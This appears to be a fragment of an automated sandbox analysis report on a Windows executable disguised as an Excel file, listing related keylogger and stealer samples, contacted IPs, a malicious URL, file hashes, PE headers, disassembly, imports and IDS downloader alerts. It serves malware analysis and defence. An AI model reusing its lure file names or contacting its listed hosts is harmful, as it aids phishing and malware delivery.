                                                                                                                                  pedido-035241.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                                  • 158.101.44.242
                                                                                                                                  QUOTATION REQUEST - BQS058.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                  • 193.122.6.168
                                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                  54328bd36c14bd82ddaa0c04b25ed9adMV GOLDEN SCHULTE DETAILS.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                  • 104.21.67.152
                                                                                                                                  PAYMENT ADVICE TT07180016-24_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                                  • 104.21.67.152
                                                                                                                                  pre-stowage.PDF.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                  • 104.21.67.152
                                                                                                                                  HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                  • 104.21.67.152
                                                                                                                                  hesaphareketi-01.pdf.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                  • 104.21.67.152
                                                                                                                                  PURCHASE ORDER TRC-0909718-24_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                                  • 104.21.67.152
                                                                                                                                  Justificante pago-09453256434687.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                                  • 104.21.67.152
                                                                                                                                  pedido-035241.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                                  • 104.21.67.152
                                                                                                                                  QUOTATION REQUEST - BQS058.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                  • 104.21.67.152
                                                                                                                                  FT876567090.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                  • 104.21.67.152
                                                                                                                                  3b5074b1b5d032e5620f69f9f700ff0eV7giEUv6Ee.batGet hashmaliciousUnknownBrowse
                                                                                                                                  • 149.154.167.220
                                                                                                                                  BwQ1ZjHbt3.batGet hashmaliciousUnknownBrowse
                                                                                                                                  • 149.154.167.220
                                                                                                                                  https://onedefender.xyz/w/a/s/?lp_key=17343c9645d1ac0fef5c105d161ba25127ffc78983&clickid=ctg89et00fes73cmfgu0&trk=fireclk.xyz&language=de&feed=7539&zone=3dcf5f1b&dm=1Get hashmaliciousUnknownBrowse
                                                                                                                                  • 149.154.167.220
                                                                                                                                  Instruction_695-18112-002_Rev.PDF.lnk (2).d.lnkGet hashmaliciousUnknownBrowse
                                                                                                                                  • 149.154.167.220
                                                                                                                                  sEOELQpFOB.lnkGet hashmaliciousRedLineBrowse
                                                                                                                                  • 149.154.167.220
                                                                                                                                  ref095vq842r70_classement_atout_france.pdf.lnk.d.lnkGet hashmaliciousRedLine, SectopRATBrowse
                                                                                                                                  • 149.154.167.220
                                                                                                                                  payload_1.htaGet hashmaliciousRedLineBrowse
                                                                                                                                  • 149.154.167.220
                                                                                                                                  PAYMENT ADVICE TT07180016-24_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                                  • 149.154.167.220
                                                                                                                                  ei0woJS3Dy.lnkGet hashmaliciousUnknownBrowse
                                                                                                                                  • 149.154.167.220
                                                                                                                                  tz1WicW6sG.lnkGet hashmaliciousUnknownBrowse
                                                                                                                                  • 149.154.167.220
                                                                                                                                  No context
                                                                                                                                  Process:C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe
                                                                                                                                  File Type:data
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):274432
                                                                                                                                  Entropy (8bit):6.786577296720934
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:6144:tjU906zNj9a9fsMOfo/wekpCyyzBBy3USGCvevdVT0ML3u:tjUe6d9a9EMOfo/wekp1gBIgCgVTNLe
                                                                                                                                  MD5:58AE01D5E5445AA65CA70E6909275FC8
                                                                                                                                  SHA1:0D5AB748D766BE753424CE503C0573C206EF75DA
                                                                                                                                  SHA-256:277FDA8BB2B7977A4E2F40BC193CF7C170E593AFD9D782E853BBA5A00FD8A7E1
                                                                                                                                  SHA-512:144D17E66197B67DB1259C51EA836960CDA0E7D9AF995C7ABFFA5A1CFF023F9CC10CEB8F55EC982F831F2D3B7DBEDBB49AC6C93BE7896CA87CFEDEC7E1EA1504
                                                                                                                                  Malicious:false
                                                                                                                                  Reputation:low
                                                                                                                                  Preview:.m.3H4M4UE94..5Y.2K7H3K4.4QE94QO5YC2K7H3K4M4QE94QO5YC2K7H3K4.4QE7+.A5.J.j.I....\86.D# R+"_kT)]%[9.3 .F$!.0-..x..&[)Q.H4>uO5YC2K7.vK4.5RE..)5YC2K7H3.4O5ZDi4QU1YC&K7H3K4..UE9.QO5.G2K7.3K.M4QG94UO5YC2K7L3K4M4QE9.UO5[C2K7H3I4..QE)4Q_5YC2[7H#K4M4QE)4QO5YC2K7H3C.I4.E94Q.1YT"K7H3K4M4QE94QO5YC2KWL3G4M4QE94QO5YC2K7H3K4M4QE94QO5YC2K7H3K4M4QE94QO5YC2K7H.K4E4QE94QO5YC2C.H3.4M4QE94QO5YmF.O<3K4),UE9.QO5CG2K5H3K4M4QE94QO5Yc2KWfA8F.4QE.$QO5.G2K%H3K(I4QE94QO5YC2K7.3KtcF4)VWQO9YC2KWL3K6M4Qk=4QO5YC2K7H3K4.4Q.94QO5YC2K7H3K4M4.}=4QO5Y.2K7J3N4.SEI.PO6YC2.7H5..O4.E94QO5YC2K7H3K4M4QE94QO5YC2K7H3K4M4QE94QO5Y.O.8..]>..E94QO5XA1O1@;K4M4QE94/O5Y.2K7.3K4z4QE.4QOXYC2o7H354M4/E945O5Y12K7)3K4.4QEV4QO[YC257H3U6e.QE3.wO7qb2K=H..Go4QO.5QO1*`2K=.1K4IGuE9>.L5YGAn7H9.0M4U6.4QE.\C2O..3H.[2QE"[hO5SC1."N3K/g.QG..QO?Yi.K4.&M4M/{g96.F5YG..DU3K2ewQE3@XO5[.8K7L.U6epQE3.s1>YC6`7b.58M4Un9.s18YC6`7b-I.@4QA../A5YG.K.jMD4M0zE.*S.:YC6a.6#K4I.Qo.J@O5]h2a.6!K4I.Qo.JBO5]h2a.6'K4I.Qo.JDO5]h2a.6%K4I.Qo.JFO5]h2a.6+K4I.Qo'6.W5YG.M.*39.X4!F
                                                                                                                                  Process:C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe
                                                                                                                                  File Type:data
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):119396
                                                                                                                                  Entropy (8bit):7.905156644392857
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:3072:JjXF99pKfpzKRIt5ix0cLBYTq2mGKdADNSAY:Jj1Y14ISxW90yDNvY
                                                                                                                                  MD5:34EAE0A79DE608976D75789A6A5E08F6
                                                                                                                                  SHA1:45B465AFFC662771FE25C548E0ADCD9938410866
                                                                                                                                  SHA-256:25A562DF1FA99D31071705E9B0962407E7CBE7A85067A85521E1541836D4E0D7
                                                                                                                                  SHA-512:21093BCDB6F9CC07408B7E491F82EBB319B79D366463A359862644EFA38167EA3375ECD808056DB0D9BE2B7CEBD217C7F403BE52D80D54DDF73C121E3A2B9002
                                                                                                                                  Malicious:false
                                                                                                                                  Reputation:low
                                                                                                                                  Preview:EA06..0..[{.:D.4..g3Mv.kY..szD.4..* .EF.5.....M...9..D.W..}.....I.....m..H..)\..k.Jk.Z..)3.Fh.I.Va-.C......)....I...#1...i.......R...\.5.Q-3J.VcY...1...Q.@..3G.$!.:\P.@..f.P....(....+`....!....S4.......#.$....8e&i...a...RD...U.:8....%.D.sJ(..hqzD...I.m.]O.....`..h`....#.?.j.....%.@...@..E$.......:4.SV..i..L......z.E....p.O.#}.$.,.H.L..N...E..*....!..&..u>i...........g.p..+...>c@...j^.HA@-14......B...[.....!/.$&............B..HV.....!U.Yb..,.=w...6)..{H..h....s5...2.......=.9.ti.Z...n..'<....6..&.Z..eO..t.UneQ..v.|.C..dT.._g.Th..uF.?..b....MM.Se..<.m..$.....3...p..X.d8s.'b2. \.$...}Y...{.Fk8.l-.."p.%.m'i@.Th18.....Fiq.U6.4../TX...........h...6..*.O..m. ."B.%.......Z...jJ.%.0...`.X..5p.F...L.8...CF.aj4....@X+T...i{..iT..b.]......i/........5.R&t.5NUQ..o.!..,....:\...Qg3*...Y......mN..(...N.H...1.&...."8....A.Rf...z.6...3J.7*.L.s.EH...C.U..5..f..T.gK.S.....e..h<.....Z:@.L.Y..&.0..m[......k[.S..zD.....S.L.K...`..d. ..gT....i.Ri.@.".4...syg..
                                                                                                                                  File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                  Entropy (8bit):6.969158191867485
                                                                                                                                  TrID:
                                                                                                                                  • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                  • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                  • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                  File name:TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe
                                                                                                                                  File size:1'079'296 bytes
                                                                                                                                  MD5:711d0893a047d1aaabd5cb4c1fd8f4ad
                                                                                                                                  SHA1:e555d7e2ec5f631e9317b62d004ff4069a4b20e2
                                                                                                                                  SHA256:8b0966ac0b9d10efd2de59fd1f3949c0c5fd24a293193396022d949cecb8ef7d
                                                                                                                                  SHA512:32017ddff18679927a74a8697a122ab8388258335c9da4fd02ef5c75deec5587b3c4a07bf8a5a72a6558501f727cf698c9bf296f1d2d1cd5eccfc94a3eaa4c26
                                                                                                                                  SSDEEP:24576:IqDEvCTbMWu7rQYlBQcBiT6rprG8aUCqgHGLXx:ITvC/MTQYxsWR7aU
                                                                                                                                  TLSH:5735BF027391D022FFAB95334B9AF7115BBC6A260123E51F13981DB9BE701B1563E7A3
                                                                                                                                  File Content Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......................j:......j:..C...j:......@.*...............................n.......~.............{.......{.......{.........z....
                                                                                                                                  Icon Hash:3570b480858580c5
                                                                                                                                  Entrypoint:0x420577
                                                                                                                                  Entrypoint Section:.text
                                                                                                                                  Digitally signed:false
                                                                                                                                  Imagebase:0x400000
                                                                                                                                  Subsystem:windows gui
                                                                                                                                  Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                                                                                                                  DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                                                                                                                  Time Stamp:0x67611DD2 [Tue Dec 17 06:44:34 2024 UTC]
                                                                                                                                  TLS Callbacks:
                                                                                                                                  CLR (.Net) Version:
                                                                                                                                  OS Version Major:5
                                                                                                                                  OS Version Minor:1
                                                                                                                                  File Version Major:5
                                                                                                                                  File Version Minor:1
                                                                                                                                  Subsystem Version Major:5
                                                                                                                                  Subsystem Version Minor:1
                                                                                                                                  Import Hash:948cc502fe9226992dce9417f952fce3
                                                                                                                                  Instruction
                                                                                                                                  call 00007F5B394AFD53h
                                                                                                                                  jmp 00007F5B394AF65Fh
                                                                                                                                  push ebp
                                                                                                                                  mov ebp, esp
                                                                                                                                  push esi
                                                                                                                                  push dword ptr [ebp+08h]
                                                                                                                                  mov esi, ecx
                                                                                                                                  call 00007F5B394AF83Dh
                                                                                                                                  mov dword ptr [esi], 0049FDF0h
                                                                                                                                  mov eax, esi
                                                                                                                                  pop esi
                                                                                                                                  pop ebp
                                                                                                                                  retn 0004h
                                                                                                                                  and dword ptr [ecx+04h], 00000000h
                                                                                                                                  mov eax, ecx
                                                                                                                                  and dword ptr [ecx+08h], 00000000h
                                                                                                                                  mov dword ptr [ecx+04h], 0049FDF8h
                                                                                                                                  mov dword ptr [ecx], 0049FDF0h
                                                                                                                                  ret
                                                                                                                                  push ebp
                                                                                                                                  mov ebp, esp
                                                                                                                                  push esi
                                                                                                                                  push dword ptr [ebp+08h]
                                                                                                                                  mov esi, ecx
                                                                                                                                  call 00007F5B394AF80Ah
                                                                                                                                  mov dword ptr [esi], 0049FE0Ch
                                                                                                                                  mov eax, esi
                                                                                                                                  pop esi
                                                                                                                                  pop ebp
                                                                                                                                  retn 0004h
                                                                                                                                  and dword ptr [ecx+04h], 00000000h
                                                                                                                                  mov eax, ecx
                                                                                                                                  and dword ptr [ecx+08h], 00000000h
                                                                                                                                  mov dword ptr [ecx+04h], 0049FE14h
                                                                                                                                  mov dword ptr [ecx], 0049FE0Ch
                                                                                                                                  ret
                                                                                                                                  push ebp
                                                                                                                                  mov ebp, esp
                                                                                                                                  push esi
                                                                                                                                  mov esi, ecx
                                                                                                                                  lea eax, dword ptr [esi+04h]
                                                                                                                                  mov dword ptr [esi], 0049FDD0h
                                                                                                                                  and dword ptr [eax], 00000000h
                                                                                                                                  and dword ptr [eax+04h], 00000000h
                                                                                                                                  push eax
                                                                                                                                  mov eax, dword ptr [ebp+08h]
                                                                                                                                  add eax, 04h
                                                                                                                                  push eax
                                                                                                                                  call 00007F5B394B23FDh
                                                                                                                                  pop ecx
                                                                                                                                  pop ecx
                                                                                                                                  mov eax, esi
                                                                                                                                  pop esi
                                                                                                                                  pop ebp
                                                                                                                                  retn 0004h
                                                                                                                                  lea eax, dword ptr [ecx+04h]
                                                                                                                                  mov dword ptr [ecx], 0049FDD0h
                                                                                                                                  push eax
                                                                                                                                  call 00007F5B394B2448h
                                                                                                                                  pop ecx
                                                                                                                                  ret
                                                                                                                                  push ebp
                                                                                                                                  mov ebp, esp
                                                                                                                                  push esi
                                                                                                                                  mov esi, ecx
                                                                                                                                  lea eax, dword ptr [esi+04h]
                                                                                                                                  mov dword ptr [esi], 0049FDD0h
                                                                                                                                  push eax
                                                                                                                                  call 00007F5B394B2431h
                                                                                                                                  test byte ptr [ebp+08h], 00000001h
                                                                                                                                  pop ecx
                                                                                                                                  Programming Language:
                                                                                                                                  • [ C ] VS2008 SP1 build 30729
                                                                                                                                  • [IMP] VS2008 SP1 build 30729
                                                                                                                                  NameVirtual AddressVirtual Size Is in Section
                                                                                                                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                  IMAGE_DIRECTORY_ENTRY_IMPORT0xc8e640x17c.rdata
                                                                                                                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0xd40000x30c80.rsrc
                                                                                                                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x1050000x7594.reloc
                                                                                                                                  IMAGE_DIRECTORY_ENTRY_DEBUG0xb0ff00x1c.rdata
                                                                                                                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                  IMAGE_DIRECTORY_ENTRY_TLS0xc34000x18.rdata
                                                                                                                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0xb10100x40.rdata
                                                                                                                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                  IMAGE_DIRECTORY_ENTRY_IAT0x9c0000x894.rdata
                                                                                                                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                                                  NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                  .text0x10000x9ab1d0x9ac000a1473f3064dcbc32ef93c5c8a90f3a6False0.565500681542811data6.668273581389308IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                  .rdata0x9c0000x2fb820x2fc00c9cf2468b60bf4f80f136ed54b3989fbFalse0.35289185209424084data5.691811547483722IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                  .data0xcc0000x706c0x480053b9025d545d65e23295e30afdbd16d9False0.04356553819444445DOS executable (block device driver @\273\)0.5846666986982398IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                  .rsrc0xd40000x30c800x30e00dace8ec6a302757a41114114a9153eceFalse0.9581102141943734data7.934774571883042IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                  .reloc0x1050000x75940x7600c68ee8931a32d45eb82dc450ee40efc3False0.7628111758474576data6.7972128181359786IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                                                                  NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                  RT_ICON0xd43500x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.3885135135135135
                                                                                                                                  RT_ICON0xd44780x162cPNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishGreat Britain0.906800563777308
                                                                                                                                  RT_STRING0xd5aa40x594dataEnglishGreat Britain0.3333333333333333
                                                                                                                                  RT_STRING0xd60380x68adataEnglishGreat Britain0.2735961768219833
                                                                                                                                  RT_STRING0xd66c40x490dataEnglishGreat Britain0.3715753424657534
                                                                                                                                  RT_STRING0xd6b540x5fcdataEnglishGreat Britain0.3087467362924282
                                                                                                                                  RT_STRING0xd71500x65cdataEnglishGreat Britain0.34336609336609336
                                                                                                                                  RT_STRING0xd77ac0x466dataEnglishGreat Britain0.3605683836589698
                                                                                                                                  RT_STRING0xd7c140x158Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0EnglishGreat Britain0.502906976744186
                                                                                                                                  RT_RCDATA0xd7d6c0x2ca1ddata1.0003610246536079
                                                                                                                                  RT_GROUP_ICON0x10478c0x14dataEnglishGreat Britain1.2
                                                                                                                                  RT_GROUP_ICON0x1047a00x14dataEnglishGreat Britain1.15
                                                                                                                                  RT_VERSION0x1047b40xdcdataEnglishGreat Britain0.6181818181818182
                                                                                                                                  RT_MANIFEST0x1048900x3efASCII text, with CRLF line terminatorsEnglishGreat Britain0.5074478649453823
                                                                                                                                  DLLImport
                                                                                                                                  WSOCK32.dllgethostbyname, recv, send, socket, inet_ntoa, setsockopt, ntohs, WSACleanup, WSAStartup, sendto, htons, __WSAFDIsSet, select, accept, listen, bind, inet_addr, ioctlsocket, recvfrom, WSAGetLastError, closesocket, gethostname, connect
                                                                                                                                  VERSION.dllGetFileVersionInfoW, VerQueryValueW, GetFileVersionInfoSizeW
                                                                                                                                  WINMM.dlltimeGetTime, waveOutSetVolume, mciSendStringW
                                                                                                                                  COMCTL32.dllImageList_ReplaceIcon, ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, InitCommonControlsEx, ImageList_Create
                                                                                                                                  MPR.dllWNetGetConnectionW, WNetCancelConnection2W, WNetUseConnectionW, WNetAddConnection2W
                                                                                                                                  WININET.dllHttpOpenRequestW, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, InternetConnectW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetReadFile, InternetQueryDataAvailable
                                                                                                                                  PSAPI.DLLGetProcessMemoryInfo
                                                                                                                                  IPHLPAPI.DLLIcmpSendEcho, IcmpCloseHandle, IcmpCreateFile
                                                                                                                                  USERENV.dllDestroyEnvironmentBlock, LoadUserProfileW, CreateEnvironmentBlock, UnloadUserProfile
                                                                                                                                  UxTheme.dllIsThemeActive
                                                                                                                                  KERNEL32.dllDuplicateHandle, CreateThread, WaitForSingleObject, HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, IsWow64Process, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, SetEndOfFile, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, FindClose, GetLongPathNameW, GetShortPathNameW, DeleteFileW, IsDebuggerPresent, CopyFileExW, MoveFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, LoadResource, LockResource, SizeofResource, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, LoadLibraryW, GetLocalTime, CompareStringW, GetCurrentThread, EnterCriticalSection, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, CopyFileW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, HeapReAlloc, HeapSize, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, GetProcessId, SetPriorityClass, VirtualAlloc, GetCurrentDirectoryW, lstrcmpiW, DecodePointer, GetLastError, RaiseException, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, InterlockedDecrement, InterlockedIncrement, ResetEvent, WaitForSingleObjectEx, IsProcessorFeaturePresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetCurrentProcess, CloseHandle, GetFullPathNameW, GetStartupInfoW, GetSystemTimeAsFileTime, InitializeSListHead, RtlUnwind, SetLastError, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, EncodePointer, ExitProcess, GetModuleHandleExW, ExitThread, ResumeThread, FreeLibraryAndExitThread, GetACP, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetStringTypeW, GetFileType, SetStdHandle, GetConsoleCP, GetConsoleMode, ReadConsoleW, GetTimeZoneInformation, FindFirstFileExW, IsValidCodePage, GetOEMCP, GetCPInfo, GetCommandLineA, GetCommandLineW, GetEnvironmentStringsW, FreeEnvironmentStringsW, SetEnvironmentVariableA, SetCurrentDirectoryW, FindNextFileW, WriteConsoleW
                                                                                                                                  USER32.dllGetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, PeekMessageW, GetInputState, UnregisterHotKey, CharLowerBuffW, MonitorFromPoint, MonitorFromRect, LoadImageW, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, ClientToScreen, GetCursorPos, DeleteMenu, CheckMenuRadioItem, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, SystemParametersInfoW, LockWindowUpdate, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetClassNameW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, RegisterHotKey, GetCursorInfo, SetWindowPos, CopyImage, AdjustWindowRectEx, SetRect, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, TrackPopupMenuEx, GetMessageW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, MessageBoxW, DefWindowProcW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, DispatchMessageW, keybd_event, TranslateMessage, ScreenToClient
                                                                                                                                  GDI32.dllEndPath, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, StrokeAndFillPath, GetDeviceCaps, SetPixel, CloseFigure, LineTo, AngleArc, MoveToEx, Ellipse, CreateCompatibleBitmap, CreateCompatibleDC, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, SelectObject, StretchBlt, CreateSolidBrush, SetTextColor, CreateFontW, GetTextFaceW, GetStockObject, CreateDCW, GetPixel, DeleteDC, GetDIBits, StrokePath
                                                                                                                                  COMDLG32.dllGetSaveFileNameW, GetOpenFileNameW
                                                                                                                                  ADVAPI32.dllGetAce, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, FreeSid, GetTokenInformation, RegCreateKeyExW, GetSecurityDescriptorDacl, GetAclInformation, GetUserNameW, AddAce, SetSecurityDescriptorDacl, InitiateSystemShutdownExW
                                                                                                                                  SHELL32.dllDragFinish, DragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW
                                                                                                                                  ole32.dllCoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, OleInitialize, OleUninitialize, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoInitializeSecurity, CoCreateInstanceEx, CoSetProxyBlanket
                                                                                                                                  OLEAUT32.dllCreateStdDispatch, CreateDispTypeInfo, UnRegisterTypeLib, UnRegisterTypeLibForUser, RegisterTypeLibForUser, RegisterTypeLib, LoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, VariantChangeType, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, SysStringLen, QueryPathOfRegTypeLib, SysAllocString, VariantInit, VariantClear, DispCallFunc, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, SafeArrayDestroyDescriptor, VariantCopy, OleLoadPicture
                                                                                                                                  Language of compilation systemCountry where language is spokenMap
                                                                                                                                  EnglishGreat Britain
                                                                                                                                  TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                  2024-12-17T09:41:25.108285+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.849706158.101.44.24280TCP
                                                                                                                                  2024-12-17T09:41:27.514527+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.849706158.101.44.24280TCP
                                                                                                                                  2024-12-17T09:41:29.137035+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.849708104.21.67.152443TCP
